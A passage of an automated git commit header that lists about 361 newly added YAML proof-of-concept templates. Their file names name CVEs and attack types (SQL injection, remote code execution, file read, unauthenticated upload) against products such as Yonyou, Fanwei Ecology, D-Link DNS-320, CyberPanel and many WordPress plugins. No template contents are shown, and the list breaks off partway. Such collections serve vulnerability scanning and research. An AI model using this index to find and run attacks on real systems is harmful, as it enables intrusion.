From 62bad0f3af601e1f9966e20037b04c92679757d9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 14 Dec 2024 12:40:31 +0000 Subject: [PATCH] 20241214 --- date.txt | 2 +- poc.txt | 359 ++++++++++++++++++ poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml | 29 ++ .../hamlintek-ISS-7000-login_handler-rce.yaml | 22 ++ ...ogin-77ccffccfac1bb6eac46823913cc705c.yaml | 59 +++ ...yuanyun_ERP_GetErpConfig_unauthorized.yaml | 20 + ...-PKIAuthenticationPlugin-admin-bypass.yaml | 21 + .../yongyou-BIP-yonbiplogin-fileread.yaml | 19 + poc/backup/indeed-wp-superbackup.yaml | 59 +++ ...-Ecology-browser-sqli-CNVD-2023-12632.yaml | 28 ++ ...yuanyun_ERP_GetErpConfig_unauthorized.yaml | 20 + poc/cve/CVE-2011-5107-2102.yaml | 29 ++ poc/cve/CVE-2014-4536-2354.yaml | 41 ++ poc/cve/CVE-2014-9094-2422.yaml | 29 ++ poc/cve/CVE-2015-2807-2500.yaml | 32 ++ poc/cve/CVE-2017-17043-2977.yaml | 35 ++ poc/cve/CVE-2019-25221.yaml | 59 +++ poc/cve/CVE-2020-11023.yaml | 59 +++ poc/cve/CVE-2020-24186-4793.yaml | 83 ++++ poc/cve/CVE-2020-35234-5026.yaml | 45 +++ poc/cve/CVE-2021-25111-5802.yaml | 26 ++ poc/cve/CVE-2022-1597-6652.yaml | 74 ++++ poc/cve/CVE-2022-1598-6654.yaml | 53 +++ poc/cve/CVE-2023-24407.yaml | 59 +++ poc/cve/CVE-2023-49196.yaml | 59 +++ poc/cve/CVE-2024-10010.yaml | 59 +++ poc/cve/CVE-2024-10104.yaml | 59 +++ poc/cve/CVE-2024-10146.yaml | 59 +++ poc/cve/CVE-2024-10471.yaml | 59 +++ poc/cve/CVE-2024-10473.yaml | 59 +++ poc/cve/CVE-2024-10480.yaml | 59 +++ poc/cve/CVE-2024-10493.yaml | 59 +++ poc/cve/CVE-2024-10510.yaml | 59 +++ poc/cve/CVE-2024-10517.yaml | 59 +++ poc/cve/CVE-2024-10518.yaml | 59 +++ poc/cve/CVE-2024-10568.yaml | 59 +++ ...0646-6a5f696424113cce85ff733ae3bc98b0.yaml | 59 +++ ...0690-9e8bc3f90f0d2a14268c428a04063b03.yaml | 59 +++ poc/cve/CVE-2024-10704.yaml | 59 +++ poc/cve/CVE-2024-10708.yaml | 59 +++ poc/cve/CVE-2024-10783.yaml | 59 +++ poc/cve/CVE-2024-10893.yaml | 59 +++ poc/cve/CVE-2024-10896.yaml | 59 +++ poc/cve/CVE-2024-10980.yaml | 59 +++ poc/cve/CVE-2024-11012.yaml | 59 +++ ...1095-b0165142a699db32c27db406fb189dac.yaml | 59 +++ poc/cve/CVE-2024-11107.yaml | 59 +++ poc/cve/CVE-2024-11140.yaml | 59 +++ poc/cve/CVE-2024-11183.yaml | 59 +++ poc/cve/CVE-2024-11190.yaml | 59 +++ poc/cve/CVE-2024-11221.yaml | 59 +++ poc/cve/CVE-2024-11275.yaml | 59 +++ ...1367-b568504cdda8a316e2c2495192fa3b93.yaml | 59 +++ poc/cve/CVE-2024-11372.yaml | 59 +++ poc/cve/CVE-2024-11373.yaml | 59 +++ ...1417-e70cae6d6cbde8c3b8b47fc874959a2c.yaml | 59 +++ ...1462-8df69847f3be73a75d55847984a2d955.yaml | 59 +++ poc/cve/CVE-2024-11502.yaml | 59 +++ ...1710-6b40285fd670b260b17a7200ea944ea1.yaml | 59 +++ ...1711-3280cdf3709d95c508956c22254e4c2e.yaml | 59 +++ ...1712-c31e31d712beebffc1ade29e9e31eb47.yaml | 59 +++ ...1713-3ce068c28a3bf30675cdafd7af7432b5.yaml | 59 +++ ...1714-6e3bac814e83994dd0e0e3a82cd823a9.yaml | 59 +++ ...1715-f8ac92a9956b6a02eeac6f3837fff40b.yaml | 59 +++ ...1720-d0f4b1ce743d359b9844d3054e4a5af9.yaml | 59 +++ ...1721-dc2aa37d169a99daa955380439331a02.yaml | 59 +++ ...1751-fd6fb920fe0d64ca3888bb1674349134.yaml | 59 +++ ...1752-932bb2de288ef26bc4c101684c7cb531.yaml | 59 +++ poc/cve/CVE-2024-11754.yaml | 59 +++ ...1755-935ec9fc2ee3b23b1ccc21acca8e8636.yaml | 59 +++ ...1759-d6a0a8830fda868046b3c5319b1e8383.yaml | 59 +++ ...1763-abc5d805ccc6f324bc8947787eeff644.yaml | 59 +++ poc/cve/CVE-2024-11767.yaml | 59 +++ ...1770-8a21d7ed25582479ddfaa17a6cbfc663.yaml | 59 +++ poc/cve/CVE-2024-11809.yaml | 59 +++ poc/cve/CVE-2024-11827.yaml | 59 +++ poc/cve/CVE-2024-11832.yaml | 59 +++ poc/cve/CVE-2024-11841.yaml | 59 +++ ...1855-c68a0514b5572dba40197a1e12cc708d.yaml | 59 +++ ...1865-93d2fdcff3de5132748a3e57487e9324.yaml | 59 +++ ...1867-3bf808c90c9dd0a57945a67a217dbe53.yaml | 59 +++ ...1869-50ed005605a356d0d3b23edb855715d9.yaml | 59 +++ ...1873-f2f885a30706e264c4c12ffd5cfc514f.yaml | 59 +++ ...1876-9cd3f7953a8fa340c5fdf6ebfeb9bc83.yaml | 59 +++ ...1877-22cf6fc826469df1501c9a0f0ba687ca.yaml | 59 +++ ...1879-59310d2dceea2163a5176b76507b44eb.yaml | 59 +++ ...1883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml | 59 +++ ...1884-55f612c1021e30ed6e11056cd7729031.yaml | 59 +++ ...1888-153488a3d489b9c026a53628a1f85eb1.yaml | 59 +++ ...1889-7b0c0efb6dca65612e5ac372a5bd0eb3.yaml | 59 +++ ...1894-88cc7cbdaa700b8fa41789611b2b65cf.yaml | 59 +++ poc/cve/CVE-2024-11910.yaml | 59 +++ poc/cve/CVE-2024-11911.yaml | 59 +++ poc/cve/CVE-2024-12015.yaml | 59 +++ poc/cve/CVE-2024-12042.yaml | 59 +++ poc/cve/CVE-2024-12300.yaml | 59 +++ poc/cve/CVE-2024-12309.yaml | 59 +++ ...2411-f0a38e379813866e02459d465ef6affd.yaml | 59 +++ poc/cve/CVE-2024-12414.yaml | 59 +++ poc/cve/CVE-2024-12417.yaml | 59 +++ poc/cve/CVE-2024-12420.yaml | 59 +++ poc/cve/CVE-2024-12421.yaml | 59 +++ ...2422-aeceb3fb45bf879d6b9a1d0dc516f06c.yaml | 59 +++ ...2446-2affa83d9110434c8964fc4fe186651f.yaml | 59 +++ ...2447-f170b29c68bc4a2c96b04066f7af171d.yaml | 59 +++ ...2448-b0024901f823c199e5df7414f136f048.yaml | 59 +++ ...2458-e6b90e547e05531a7e2ba9dd1b97c927.yaml | 59 +++ ...2459-1c8f2c123589ae3f3e53f13d47253fcf.yaml | 59 +++ poc/cve/CVE-2024-12465.yaml | 59 +++ ...2474-143276e3178f42c70ef45aed9f8f19ab.yaml | 59 +++ ...2501-c27faf539f1a53d9009e9c3a53602e7a.yaml | 59 +++ ...2502-1f199f73b33e699daa4c51027e49df2e.yaml | 59 +++ ...2517-efd628a1954edd29546cb9041fe9b427.yaml | 59 +++ ...2523-3e0bf521f24a7f7e87f4a5a124f0141d.yaml | 59 +++ ...2555-5cbce38a9099186c24f323bfe5404451.yaml | 59 +++ poc/cve/CVE-2024-12572.yaml | 59 +++ poc/cve/CVE-2024-12574.yaml | 59 +++ ...2578-55a6532fce1626d6ca01169c30129bf3.yaml | 59 +++ poc/cve/CVE-2024-12579.yaml | 59 +++ poc/cve/CVE-2024-12581.yaml | 59 +++ ...2628-d21dcffe48f9c4b21314ab529a797a81.yaml | 59 +++ poc/cve/CVE-2024-37250.yaml | 59 +++ poc/cve/CVE-2024-43222.yaml | 59 +++ poc/cve/CVE-2024-43300.yaml | 59 +++ poc/cve/CVE-2024-43968.yaml | 59 +++ poc/cve/CVE-2024-47321.yaml | 59 +++ poc/cve/CVE-2024-49323.yaml | 59 +++ poc/cve/CVE-2024-49334.yaml | 59 +++ poc/cve/CVE-2024-5029.yaml | 59 +++ poc/cve/CVE-2024-50423.yaml | 59 +++ poc/cve/CVE-2024-50504.yaml | 59 +++ poc/cve/CVE-2024-50506.yaml | 59 +++ poc/cve/CVE-2024-50507.yaml | 59 +++ poc/cve/CVE-2024-50508.yaml | 59 +++ poc/cve/CVE-2024-50509.yaml | 59 +++ poc/cve/CVE-2024-50510.yaml | 59 +++ poc/cve/CVE-2024-50511.yaml | 59 +++ poc/cve/CVE-2024-50512.yaml | 59 +++ poc/cve/CVE-2024-50513.yaml | 59 +++ poc/cve/CVE-2024-50514.yaml | 59 +++ poc/cve/CVE-2024-50515.yaml | 59 +++ poc/cve/CVE-2024-50516.yaml | 59 +++ poc/cve/CVE-2024-50550.yaml | 59 +++ poc/cve/CVE-2024-51615.yaml | 59 +++ poc/cve/CVE-2024-51647.yaml | 59 +++ poc/cve/CVE-2024-51792.yaml | 59 +++ poc/cve/CVE-2024-51815.yaml | 59 +++ poc/cve/CVE-2024-53278.yaml | 59 +++ poc/cve/CVE-2024-53725.yaml | 59 +++ poc/cve/CVE-2024-53729.yaml | 59 +++ poc/cve/CVE-2024-53737.yaml | 59 +++ poc/cve/CVE-2024-53738.yaml | 59 +++ poc/cve/CVE-2024-53739.yaml | 59 +++ poc/cve/CVE-2024-53803.yaml | 59 +++ poc/cve/CVE-2024-53804.yaml | 59 +++ poc/cve/CVE-2024-53805.yaml | 59 +++ poc/cve/CVE-2024-53807.yaml | 59 +++ poc/cve/CVE-2024-53808.yaml | 59 +++ poc/cve/CVE-2024-53812.yaml | 59 +++ poc/cve/CVE-2024-53815.yaml | 59 +++ poc/cve/CVE-2024-53817.yaml | 59 +++ poc/cve/CVE-2024-53818.yaml | 59 +++ poc/cve/CVE-2024-53819.yaml | 59 +++ poc/cve/CVE-2024-53823.yaml | 59 +++ poc/cve/CVE-2024-53824.yaml | 59 +++ poc/cve/CVE-2024-53826.yaml | 59 +++ poc/cve/CVE-2024-54206.yaml | 59 +++ poc/cve/CVE-2024-54207.yaml | 59 +++ poc/cve/CVE-2024-54212.yaml | 59 +++ poc/cve/CVE-2024-54213.yaml | 59 +++ poc/cve/CVE-2024-54214.yaml | 59 +++ poc/cve/CVE-2024-54215.yaml | 59 +++ poc/cve/CVE-2024-54216.yaml | 59 +++ poc/cve/CVE-2024-54217.yaml | 59 +++ poc/cve/CVE-2024-54218.yaml | 59 +++ poc/cve/CVE-2024-54219.yaml | 59 +++ poc/cve/CVE-2024-54220.yaml | 59 +++ poc/cve/CVE-2024-54221.yaml | 59 +++ poc/cve/CVE-2024-54223.yaml | 59 +++ poc/cve/CVE-2024-54224.yaml | 59 +++ poc/cve/CVE-2024-54225.yaml | 59 +++ poc/cve/CVE-2024-54226.yaml | 59 +++ poc/cve/CVE-2024-54227.yaml | 59 +++ poc/cve/CVE-2024-54228.yaml | 59 +++ poc/cve/CVE-2024-54230.yaml | 59 +++ poc/cve/CVE-2024-54231.yaml | 59 +++ poc/cve/CVE-2024-54232.yaml | 59 +++ poc/cve/CVE-2024-54247.yaml | 59 +++ poc/cve/CVE-2024-54250.yaml | 59 +++ poc/cve/CVE-2024-54251.yaml | 59 +++ poc/cve/CVE-2024-54253.yaml | 59 +++ poc/cve/CVE-2024-54255.yaml | 59 +++ poc/cve/CVE-2024-54260.yaml | 59 +++ poc/cve/CVE-2024-7982.yaml | 59 +++ poc/cve/CVE-2024-8157.yaml | 59 +++ poc/cve/CVE-2024-8378.yaml | 59 +++ poc/cve/CVE-2024-8444.yaml | 59 +++ poc/cve/CVE-2024-8625.yaml | 59 +++ ...9111-581fc93879c1c54ef26503d9dcc6ddcf.yaml | 59 +++ poc/cve/CVE-2024-9290.yaml | 59 +++ poc/cve/CVE-2024-9422.yaml | 59 +++ poc/cve/CVE-2024-9428.yaml | 59 +++ poc/cve/CVE-2024-9608.yaml | 59 +++ poc/cve/CVE-2024-9651.yaml | 59 +++ ...9698-dbff952933f5639b29a1b80e2c7a52b6.yaml | 59 +++ poc/cve/CVE-2024-9768.yaml | 59 +++ poc/cve/CVE-2024-9828.yaml | 59 +++ poc/cve/CVE-2024-9835.yaml | 59 +++ poc/cve/CVE-2024-9836.yaml | 59 +++ poc/cve/CVE-2024-9934.yaml | 59 +++ ...boot-getTotalData-sqli-CVE-2024-48307.yaml | 23 ++ poc/detect/adbuddy-adblocker-detection.yaml | 59 +++ ...down-afc1b693115a4259c31be875ae4878db.yaml | 59 +++ .../cyberpanel-upgrademysqlstatus-rce.yaml | 24 ++ .../AnyShare-Usrm_GetAllUsers-infoleak.yaml | 21 + poc/other/abcbiz-addons.yaml | 59 +++ ...ment-37cf54b4fd530e8cbe84be3c76ac823a.yaml | 59 +++ ...ment-e002b76cae1c5fe698d73bad818d1658.yaml | 59 +++ poc/other/aio-contact.yaml | 59 +++ poc/other/all-in-one-slider.yaml | 59 +++ poc/other/alphabetical-list.yaml | 59 +++ ...tion-a3308f3b5497bd4ba2d82def5ce6916c.yaml | 59 +++ poc/other/blizzard-quotes.yaml | 59 +++ ...ache-b25e0848713a993a19d7a570188681d3.yaml | 59 +++ poc/other/booking-system-trafft.yaml | 59 +++ ...ents-ae0876cbc8a6ea5bc63f81816ddd03a6.yaml | 59 +++ ...ukza-1d18f7cdcaadc800f7e99e165e820759.yaml | 59 +++ poc/other/bulk-role-change.yaml | 59 +++ poc/other/cb-logo-slider.yaml | 59 +++ ...olio-99848fed06847f56568685ec4d7abf53.yaml | 59 +++ ...mbed-078fbbdf831b8258d6e8b451d9e7fb0e.yaml | 59 +++ ...port-3d9ed4f73a1e8e89ff28ad42207f57cc.yaml | 59 +++ poc/other/designer.yaml | 59 +++ poc/other/dsdownloadlist.yaml | 59 +++ ...eeno-57163addaabbee05984ca77e6d31881e.yaml | 59 +++ poc/other/fat-services-booking.yaml | 59 +++ ...form-73d12813260178303738b5378f138bfb.yaml | 59 +++ ...creen-page-background-image-slideshow.yaml | 59 +++ ...code-9c361274065595fa7c1b34cfc52539a1.yaml | 59 +++ ...code-b22e11dd16a8eba4c44d1ec8159b3556.yaml | 59 +++ ...mbed-2234b2001bef09d3310372cf737d335d.yaml | 59 +++ poc/other/gmw-premium-settings.yaml | 59 +++ poc/other/hello-in-all-languages.yaml | 59 +++ poc/other/hits-counter.yaml | 59 +++ ...ents-fbff3ca801016ea3ccdd49c17eb80e43.yaml | 59 +++ ...-oaplusrangedownloadfile-filedownload.yaml | 19 + poc/other/jiusi-oa-dl-fileread.yaml | 19 + poc/other/jquery-manager.yaml | 59 +++ .../kingdee_eas_pdfViewLocal_fileread.yaml | 19 + .../kingview-KingPortal-img-fileread.yaml | 19 + ...dget-ce4441524b592e785043e6070388f53a.yaml | 59 +++ ...nfts-63e1fa011074b96657eb8fc01827c46b.yaml | 59 +++ poc/other/logs-de-connexion.yaml | 59 +++ poc/other/newsmanapp.yaml | 59 +++ poc/other/newspack-plugin.yaml | 59 +++ poc/other/notibar.yaml | 59 +++ poc/other/ootb-openstreetmap.yaml | 59 +++ poc/other/planning-center-online-giving.yaml | 59 +++ ...lezi-4a635b36fc2f020e6e97470ee9033e55.yaml | 59 +++ ...-pdf-8ab47ff832f5f5cf5ba543f690973fee.yaml | 59 +++ ...ider-c7b7350193feff134087fae14530c8a3.yaml | 59 +++ ...iews-6353d59c8166d0c7835a56c9603f6772.yaml | 59 +++ poc/other/primer-mydata.yaml | 59 +++ .../products-stock-manager-with-excel.yaml | 59 +++ .../property-hive-stamp-duty-calculator.yaml | 59 +++ poc/other/revy.yaml | 59 +++ poc/other/rrdevs-for-elementor.yaml | 59 +++ ...ntor-31466df2cf677a943b18b87d140554bf.yaml | 59 +++ ...ator-64cca06d1166ced2ac235d17d2f88e70.yaml | 59 +++ ...ster-38242ca08bf2b38877007cc96b7c92a1.yaml | 59 +++ poc/other/svg-shortcode.yaml | 59 +++ poc/other/sweetdate.yaml | 59 +++ ...aker-daf9e2cf38c5806dd492be7fef17b720.yaml | 59 +++ ...over-cde275ba1470f5ed86bd89d6dd9707b4.yaml | 59 +++ ...nker-89aed934f46868a1f2162bc8d7aacc36.yaml | 59 +++ poc/other/themify-store-locator.yaml | 59 +++ .../tianrongxin-TopSAG-download-download.yaml | 23 ++ ...stem-5a3ee1f11c4a6d8e9eba3cf37c043750.yaml | 59 +++ poc/other/unlock-addons-for-elementor.yaml | 59 +++ ...ents-134a8cc9ff775949b36d0becbb4ef51d.yaml | 59 +++ ...wangyuxingyun_vpn_client_filedownload.yaml | 30 ++ ...code-ba5e554357f7d9eec7e0e2ce4da9ba5f.yaml | 59 +++ poc/other/woo-product-excel-importer.yaml | 59 +++ poc/other/wot-elementor-widgets.yaml | 59 +++ ...ou-BIP-getolapconnectionlist-infoleak.yaml | 19 + .../yonyou-UFIDA-NC-download-fileread.yaml | 19 + .../D-Link_DNS-320-account_mgr-rce.yaml | 25 ++ .../D-Link_DNS-320-scan_dsk-rce.yaml | 25 ++ .../ar-for-woocommerce.yaml | 59 +++ .../cyberpanel-upgrademysqlstatus-rce.yaml | 24 ++ ...down-a5f6ea64e6ade169785eed830efe7d5f.yaml | 59 +++ .../hamlintek-ISS-7000-login_handler-rce.yaml | 22 ++ .../kingdee_eas_apputil_rce.yaml | 20 + .../meite-crm-sync_emp_weixin-rce.yaml | 19 + .../min-and-max-quantity-for-woocommerce.yaml | 59 +++ .../ni-woocommerce-order-export.yaml | 59 +++ .../prodigy-commerce.yaml | 59 +++ ...anrongxin-yunweishenji-synRequest-rce.yaml | 33 ++ ...erce-product-excel-importer-bulk-edit.yaml | 59 +++ .../woocommerce-myparcel.yaml | 59 +++ ...arch-19b216f4cb81ff6b86947c3420c19a79.yaml | 59 +++ ...arch-cb1ebc1aa3b7aa8c2bfe19c90a10af1b.yaml | 59 +++ ...1095-b0165142a699db32c27db406fb189dac.yaml | 59 +++ ...1855-c68a0514b5572dba40197a1e12cc708d.yaml | 59 +++ ...1867-3bf808c90c9dd0a57945a67a217dbe53.yaml | 59 +++ ...1869-50ed005605a356d0d3b23edb855715d9.yaml | 59 +++ ...1883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml | 59 +++ ...9698-dbff952933f5639b29a1b80e2c7a52b6.yaml | 59 +++ poc/sql/adbuddy-adblocker-detection.yaml | 59 +++ ...core-e44fdb3a4ce9acdbe0ece5ab8b5a4c4a.yaml | 59 +++ .../cyberpanel-upgrademysqlstatus-rce.yaml | 24 ++ poc/sql/fanwei-Ecology-LoginSSO-sqli.yaml | 29 ++ ...-Ecology-browser-sqli-CNVD-2023-12632.yaml | 28 ++ ...down-afc1b693115a4259c31be875ae4878db.yaml | 59 +++ ...boot-getTotalData-sqli-CVE-2024-48307.yaml | 23 ++ poc/sql/movie-database.yaml | 59 +++ poc/sql/qiwang-ERP-drawGrid-sqli.yaml | 29 ++ ...ator-03696418e2ddb2e57359bcf1347e1091.yaml | 59 +++ ...rtal-dc870f31dbdd3ed85cf5c81a865becfd.yaml | 59 +++ ...-map-696be7426132daf80e136f71893126db.yaml | 59 +++ poc/sql/yongyou-nc-process-sqli.yaml | 26 ++ ...yongyou-u8c-cloud-approveservlet-sqli.yaml | 22 ++ .../zhilink-SRM-quickReceiptDetail-sqli.yaml | 20 + .../cyberpanel-upgrademysqlstatus-rce.yaml | 24 ++ .../fanwei-Ecology-LoginSSO-sqli.yaml | 29 ++ ...-Ecology-browser-sqli-CNVD-2023-12632.yaml | 28 ++ ...boot-getTotalData-sqli-CVE-2024-48307.yaml | 23 ++ .../qiwang-ERP-drawGrid-sqli.yaml | 29 ++ .../yongyou-nc-process-sqli.yaml | 26 ++ ...yongyou-u8c-cloud-approveservlet-sqli.yaml | 22 ++ .../zhilink-SRM-quickReceiptDetail-sqli.yaml | 20 + poc/upload/EKing-Base64Upload-fileupload.yaml | 31 ++ ...et-TPlus-FileUploadHandler-uploadfile.yaml | 36 ++ ...load-eef332a3e9a940fc24b6a8b85a58d6b7.yaml | 59 +++ poc/upload/h3c-CAS-CVM-fd-uploadfile.yaml | 42 ++ .../inspur-GS-UploadListFile-uploadfile.yaml | 39 ++ ...ia-weixinshangqiang-mobile-fileupload.yaml | 33 ++ poc/upload/meite-crm-upload-upload.yaml | 58 +++ poc/upload/nuuo-upload-uploadfile.yaml | 36 ++ ...anjia-erp-uploadimgnocheck-fileupload.yaml | 45 +++ .../yongyou-u8c-esnserver-fileupload.yaml | 35 ++ .../yonyou-U8clouderp-upload-uploadfile.yaml | 27 ++ ...lanling-oa-hrstaffwebservice-fileread.yaml | 42 ++ ...erce-product-excel-importer-bulk-edit.yaml | 59 +++ poc/wordpress/indeed-wp-superbackup.yaml | 59 +++ poc/wordpress/jlayer-parallax-slider-wp.yaml | 59 +++ poc/wordpress/jwp-a11y.yaml | 59 +++ poc/wordpress/real-wp-shop-lite.yaml | 59 +++ ...users-import-export-with-excel-for-wp.yaml | 59 +++ ...guru-bb28f01cd39849324f89e02e0f2950e5.yaml | 59 +++ poc/wordpress/wp-auctions.yaml | 59 +++ poc/wordpress/wp-donimedia-carousel.yaml | 59 +++ ...rtal-0fd8a0f3624a9ac01ba2ce3c3af9b360.yaml | 59 +++ ...rtal-44ca926d802c7e810b6f185672896cf3.yaml | 59 +++ ...rtal-ac656f0515b546b4fd6aadacc13c1a52.yaml | 59 +++ ...rtal-ae4beac744bf60cad4d49b935292f33a.yaml | 59 +++ ...rtal-dc870f31dbdd3ed85cf5c81a865becfd.yaml | 59 +++ ...rtal-fa33fbce4070912e4a2de446cc7f9493.yaml | 59 +++ ...r-50-b363eafeebe4e86c4b8a3cfae536824b.yaml | 59 +++ poc/wordpress/wp-tithely.yaml | 59 +++ poc/wordpress/wpcasa.yaml | 59 +++ 361 files changed, 19718 insertions(+), 1 deletion(-) create mode 100644 poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml create mode 100644 poc/auth/hamlintek-ISS-7000-login_handler-rce.yaml create mode 100644 poc/auth/ider-login-77ccffccfac1bb6eac46823913cc705c.yaml create mode 100644 poc/auth/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml create mode 100644 poc/auth/solr-PKIAuthenticationPlugin-admin-bypass.yaml create mode 100644 poc/auth/yongyou-BIP-yonbiplogin-fileread.yaml create mode 100644 poc/backup/indeed-wp-superbackup.yaml create mode 100644 poc/cnvd/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml create mode 100644 poc/config/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml create mode 100644 poc/cve/CVE-2011-5107-2102.yaml create mode 100644 poc/cve/CVE-2014-4536-2354.yaml create mode 100644 poc/cve/CVE-2014-9094-2422.yaml create mode 100644 poc/cve/CVE-2015-2807-2500.yaml create mode 100644 poc/cve/CVE-2017-17043-2977.yaml create mode 100644 poc/cve/CVE-2019-25221.yaml create mode 100644 poc/cve/CVE-2020-11023.yaml create mode 100644 poc/cve/CVE-2020-24186-4793.yaml create mode 100644 poc/cve/CVE-2020-35234-5026.yaml create mode 100644 poc/cve/CVE-2021-25111-5802.yaml create mode 100644 poc/cve/CVE-2022-1597-6652.yaml create mode 100644 poc/cve/CVE-2022-1598-6654.yaml create mode 100644 poc/cve/CVE-2023-24407.yaml create mode 100644 poc/cve/CVE-2023-49196.yaml create mode 100644 poc/cve/CVE-2024-10010.yaml create mode 100644 poc/cve/CVE-2024-10104.yaml create mode 100644 poc/cve/CVE-2024-10146.yaml create mode 100644 poc/cve/CVE-2024-10471.yaml create mode 100644 poc/cve/CVE-2024-10473.yaml create mode 100644 poc/cve/CVE-2024-10480.yaml create mode 100644 poc/cve/CVE-2024-10493.yaml create mode 100644 poc/cve/CVE-2024-10510.yaml create mode 100644 poc/cve/CVE-2024-10517.yaml create mode 100644 poc/cve/CVE-2024-10518.yaml create mode 100644 poc/cve/CVE-2024-10568.yaml create mode 100644 poc/cve/CVE-2024-10646-6a5f696424113cce85ff733ae3bc98b0.yaml create mode 100644 poc/cve/CVE-2024-10690-9e8bc3f90f0d2a14268c428a04063b03.yaml create mode 100644 poc/cve/CVE-2024-10704.yaml create mode 100644 poc/cve/CVE-2024-10708.yaml create mode 100644 poc/cve/CVE-2024-10783.yaml create mode 100644 poc/cve/CVE-2024-10893.yaml create mode 100644 poc/cve/CVE-2024-10896.yaml create mode 100644 poc/cve/CVE-2024-10980.yaml create mode 100644 poc/cve/CVE-2024-11012.yaml create mode 100644 poc/cve/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml create mode 100644 poc/cve/CVE-2024-11107.yaml create mode 100644 poc/cve/CVE-2024-11140.yaml create mode 100644 poc/cve/CVE-2024-11183.yaml create mode 100644 poc/cve/CVE-2024-11190.yaml create mode 100644 poc/cve/CVE-2024-11221.yaml create mode 100644 poc/cve/CVE-2024-11275.yaml create mode 100644 poc/cve/CVE-2024-11367-b568504cdda8a316e2c2495192fa3b93.yaml create mode 100644 poc/cve/CVE-2024-11372.yaml create mode 100644 poc/cve/CVE-2024-11373.yaml create mode 100644 poc/cve/CVE-2024-11417-e70cae6d6cbde8c3b8b47fc874959a2c.yaml create mode 100644 poc/cve/CVE-2024-11462-8df69847f3be73a75d55847984a2d955.yaml create mode 100644 poc/cve/CVE-2024-11502.yaml create mode 100644 poc/cve/CVE-2024-11710-6b40285fd670b260b17a7200ea944ea1.yaml create mode 100644 poc/cve/CVE-2024-11711-3280cdf3709d95c508956c22254e4c2e.yaml create mode 100644 poc/cve/CVE-2024-11712-c31e31d712beebffc1ade29e9e31eb47.yaml create mode 100644 poc/cve/CVE-2024-11713-3ce068c28a3bf30675cdafd7af7432b5.yaml create mode 100644 poc/cve/CVE-2024-11714-6e3bac814e83994dd0e0e3a82cd823a9.yaml create mode 100644 poc/cve/CVE-2024-11715-f8ac92a9956b6a02eeac6f3837fff40b.yaml create mode 100644 poc/cve/CVE-2024-11720-d0f4b1ce743d359b9844d3054e4a5af9.yaml create mode 100644 poc/cve/CVE-2024-11721-dc2aa37d169a99daa955380439331a02.yaml create mode 100644 poc/cve/CVE-2024-11751-fd6fb920fe0d64ca3888bb1674349134.yaml create mode 100644 poc/cve/CVE-2024-11752-932bb2de288ef26bc4c101684c7cb531.yaml create mode 100644 poc/cve/CVE-2024-11754.yaml create mode 100644 poc/cve/CVE-2024-11755-935ec9fc2ee3b23b1ccc21acca8e8636.yaml create mode 100644 poc/cve/CVE-2024-11759-d6a0a8830fda868046b3c5319b1e8383.yaml create mode 100644 poc/cve/CVE-2024-11763-abc5d805ccc6f324bc8947787eeff644.yaml create mode 100644 poc/cve/CVE-2024-11767.yaml create mode 100644 poc/cve/CVE-2024-11770-8a21d7ed25582479ddfaa17a6cbfc663.yaml create mode 100644 poc/cve/CVE-2024-11809.yaml create mode 100644 poc/cve/CVE-2024-11827.yaml create mode 100644 poc/cve/CVE-2024-11832.yaml create mode 100644 poc/cve/CVE-2024-11841.yaml create mode 100644 poc/cve/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml create mode 100644 poc/cve/CVE-2024-11865-93d2fdcff3de5132748a3e57487e9324.yaml create mode 100644 poc/cve/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml create mode 100644 poc/cve/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml create mode 100644 poc/cve/CVE-2024-11873-f2f885a30706e264c4c12ffd5cfc514f.yaml create mode 100644 poc/cve/CVE-2024-11876-9cd3f7953a8fa340c5fdf6ebfeb9bc83.yaml create mode 100644 poc/cve/CVE-2024-11877-22cf6fc826469df1501c9a0f0ba687ca.yaml create mode 100644 poc/cve/CVE-2024-11879-59310d2dceea2163a5176b76507b44eb.yaml create mode 100644 poc/cve/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml create mode 100644 poc/cve/CVE-2024-11884-55f612c1021e30ed6e11056cd7729031.yaml create mode 100644 poc/cve/CVE-2024-11888-153488a3d489b9c026a53628a1f85eb1.yaml create mode 100644 poc/cve/CVE-2024-11889-7b0c0efb6dca65612e5ac372a5bd0eb3.yaml create mode 100644 poc/cve/CVE-2024-11894-88cc7cbdaa700b8fa41789611b2b65cf.yaml create mode 100644 poc/cve/CVE-2024-11910.yaml create mode 100644 poc/cve/CVE-2024-11911.yaml create mode 100644 poc/cve/CVE-2024-12015.yaml create mode 100644 poc/cve/CVE-2024-12042.yaml create mode 100644 poc/cve/CVE-2024-12300.yaml create mode 100644 poc/cve/CVE-2024-12309.yaml create mode 100644 poc/cve/CVE-2024-12411-f0a38e379813866e02459d465ef6affd.yaml create mode 100644 poc/cve/CVE-2024-12414.yaml create mode 100644 poc/cve/CVE-2024-12417.yaml create mode 100644 poc/cve/CVE-2024-12420.yaml create mode 100644 poc/cve/CVE-2024-12421.yaml create mode 100644 poc/cve/CVE-2024-12422-aeceb3fb45bf879d6b9a1d0dc516f06c.yaml create mode 100644 poc/cve/CVE-2024-12446-2affa83d9110434c8964fc4fe186651f.yaml create mode 100644 poc/cve/CVE-2024-12447-f170b29c68bc4a2c96b04066f7af171d.yaml create mode 100644 poc/cve/CVE-2024-12448-b0024901f823c199e5df7414f136f048.yaml create mode 100644 poc/cve/CVE-2024-12458-e6b90e547e05531a7e2ba9dd1b97c927.yaml create mode 100644 poc/cve/CVE-2024-12459-1c8f2c123589ae3f3e53f13d47253fcf.yaml create mode 100644 poc/cve/CVE-2024-12465.yaml create mode 100644 poc/cve/CVE-2024-12474-143276e3178f42c70ef45aed9f8f19ab.yaml create mode 100644 poc/cve/CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a.yaml create mode 100644 poc/cve/CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e.yaml create mode 100644 poc/cve/CVE-2024-12517-efd628a1954edd29546cb9041fe9b427.yaml create mode 100644 